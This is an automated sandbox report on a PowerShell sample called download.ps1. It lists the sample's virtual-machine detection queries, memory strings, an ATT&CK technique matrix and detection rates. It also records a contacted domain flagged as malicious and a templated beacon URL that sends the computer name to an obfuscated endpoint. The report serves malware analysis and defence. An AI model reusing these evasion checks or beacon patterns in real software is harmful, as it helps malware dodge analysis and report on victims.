Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9900Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware(
Source: powershell.exe, 00000001.00000002.36324659770.00000257B48D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine(
Source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote ServicesData from Local System1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
download.ps115%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=5270%Avira URL Cloudsafe
http://kmaealcfcalhcac.top0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
http://crl.microsoft.0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe
http://crl.v0%Avira URL Cloudsafe
https://apis.google.comXz0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kmaealcfcalhcac.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.191.196
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schema.org/WebPagepowershell.exe, 00000001.00000002.36241645195.000002579D711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D71B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D716000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/webhp?tab=wwpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://lh3.googleusercontent.com/ogw/default-user=s24XIpowershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://kmaealcfcalhcac.toppowershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579E3C0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://lh3.googleusercontent.com/ogw/default-user=s96Xzpowershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.comXzpowershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D439000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/PesterXzpowershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://apis.google.compowershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://play.google.com/?hl=en&tab=w8powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/intl/en/about/products?tab=whXzpowershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://mail.google.com/mail/?tab=wmpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.microsoft.powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.google.com/preferences?hl=enpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com/?tab=w1powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schema.org/WebPageXzpowershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.com/history/optout?hl=enpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://github.com/Pester/Pesterhpowershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24Xzpowershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crl.vpowershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://oneget.orgpowershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          45.61.136.138
                                                                                                          		kmaealcfcalhcac.topUnited States
                                                                                                          		40676AS40676UStrue
                                                                                                          142.250.191.196
                                                                                                          		www.google.comUnited States
                                                                                                          		15169GOOGLEUSfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                          Analysis ID:1589104
                                                                                                          Start date and time:2025-01-11 09:43:32 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 5m 22s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                          Run name:Suspected VM Detection
                                                                                                          Number of analysed new started processes analysed:5
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
